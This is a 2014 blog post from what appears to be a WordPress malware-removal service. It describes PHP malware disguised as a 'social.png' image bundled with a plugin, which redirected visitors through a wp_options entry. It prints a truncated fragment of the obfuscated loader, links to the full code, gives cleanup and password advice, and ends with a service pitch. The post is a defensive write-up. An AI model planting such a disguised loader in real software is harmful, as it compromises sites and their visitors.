sneaky social.png is not your friend – it contains malware!

sneaky social.png is not your friend – it contains malware!

April 15, 2014 Blog PHP Security News & Information Wordpress Security 1

Over the past week we came across a couple instances of interesting malware that was not easily detected. We called it the sneaky social.png. It’s not really an image – if you were to open it up with a text editor, you would more than likely see this:


< ? php error_reporting( 0 ) ; if (!defined('WP_OPTION_KEY')) { function txyFqaETRPUyiEgQatokJIY() { define('WP_OPTION_KEY','c'); new GsSYoMTsQibQgcHcuGmrg(); } add_action('init', 'txyFqaETRPUyiEgQatokJIY'); } class VtkddwvkYgCDDRRWbgRtw{ private $AcheTwkrhTtKmyatQGqYFc, $SntMBKFkfTlUzXyNVQedo, $YcmysXeieEGqvkjRIsPYg; public function __construct($BZaxGALPLdVfntBIQWUPs = 'old'){ if ($BZaxGALPLdVfntBIQWUPs == 'new'){ $this->QxEolVsSqvJZyRSgHFmL(); } else { $this->yOlGcuINHlzAVPznEbGNvwJM(); } $this->SntMBKFkfTlUzXyNVQedo = .......

You can see the full details of the code here: http://pastebin.com/aTyVvr0D

In this particular instance, it was packaged with a plugin that the client had installed on his wordpress site – sneaky. What it did was create a redirect to a Justin Bieber video on youtube – by inserting a custom option in the wp_options table. So if you find one of these on your server, it may require that you check your wp_options table for the option that it added. We did see in other cases where the malicious redirect was simply in the social.png file that was included in a page – much easier to clean up that’s for sure!

Once you have cleaned and restored your site to normal, if you haven’t already – change ALL passwords, for FTP, cPanel, administrator accounts and make sure you do not have any FTP accounts on your server that should not be there. To make your passwords strong, use something strong between 8-12 alpha-numeric characters, with at least 1 symbol (!,@,#,etc), and make sure you change it often (every 30-60 days). Better yet, if your host allows it – use sFTP (FTP sends your information in plain text which allows for attackers to “sniff” out credentials)

And last but not least – scan your local machine (or your developer, web designer or site admin if it’s not you) for possible viruses, trojans and keyloggers. There are several free scanners available such as avg.com free version and malwarebytes.org. We typically recommend you run multiple because NO anti-virus scan is 100% fail safe.

If you aren’t technical and you need immediate assistance, we can reduce the impact and prevent further damage quickly –  Now is your chance, we can have the typical site cleaned and secured in just a few hours.  Check out our Pricing page for details on our professional, reliable malware removal services.